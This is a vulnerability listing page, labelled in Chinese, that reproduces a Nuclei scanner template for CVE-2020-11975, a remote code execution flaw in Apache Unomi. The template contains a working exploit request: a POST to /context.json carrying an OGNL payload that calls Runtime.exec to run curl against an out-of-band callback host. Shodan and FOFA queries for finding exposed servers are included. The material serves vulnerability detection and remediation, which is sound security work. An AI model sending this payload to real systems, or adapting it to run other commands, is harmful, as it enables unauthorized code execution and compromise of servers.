CVE-2020-11975: Apache Unomi - Remote Code Execution

日期: 2025-08-01 | 影响软件: Apache Unomi | POC: 已公开

漏洞描述

Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process, enabling attackers to execute arbitrary code.

PoC代码[已公开]

id: CVE-2020-11975

info:
  name: Apache Unomi - Remote Code Execution
  author: Sourabh-Sahu
  severity: critical
  description: |
    Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process, enabling attackers to execute arbitrary code.
  impact: |
    Successful exploitation allows an attacker to execute arbitrary code on the server with the privileges of the Java process, potentially leading to complete system compromise.
  remediation: |
    Update Apache Unomi to version 1.5.2 or later. Disable OGNL scripting in conditions if not required.
  reference:
    - https://xz.aliyun.com/news/8157
    - https://github.com/1135/unomi_exploit
    - https://unomi.apache.org/security/cve-2020-11975.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11975
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11975
    cwe-id: CWE-94
    epss-score: 0.8271
    epss-percentile: 0.99197
    cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: unomi
    shodan-query: http.title:"Apache Unomi"
    fofa-query: title="Apache Unomi"
  tags: cve,cve2020,apache,unomi,rce,ognl,oast

http:
  - method: POST
    path:
      - "{{BaseURL}}/context.json"
    headers:
      Content-Type: application/json
    body: |
      {
        "personalizations":[
          {
            "id":"gender-test_anystr",
            "strategy":"matching-first",
            "strategyOptions":{
              "fallback":"var2"
            },
            "contents":[
              {
                "filters":[
                  {
                    "condition":{
                      "parameterValues":{
                        "propertyName":"(#r=@java.lang.Runtime@getRuntime()).(#r.exec(\"curl {{interactsh-url}}\"))",
                        "comparisonOperator":"equals_anystr",
                        "propertyValue":"male_anystr"
                      },
                      "type":"profilePropertyCondition"
                    }
                  }
                ]
              }
            ]
          }
        ],
        "sessionId":"test-demo-session-id"
      }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: dsl
        dsl:
          - 'contains_all(body, "profileId\":", "sessionId\":")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200 || status_code == 500'
        condition: and
# digest: 4a0a00473045022079c27bd0e9ef240eff67ee13b77b699ca3d5023e5f9818ad71927ebde6c67e460221009089da1bf5778468c385cc39e0d6919d5046fdbecff29caebbc2b9ea6bfee62b:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-11975.yaml

相关漏洞推荐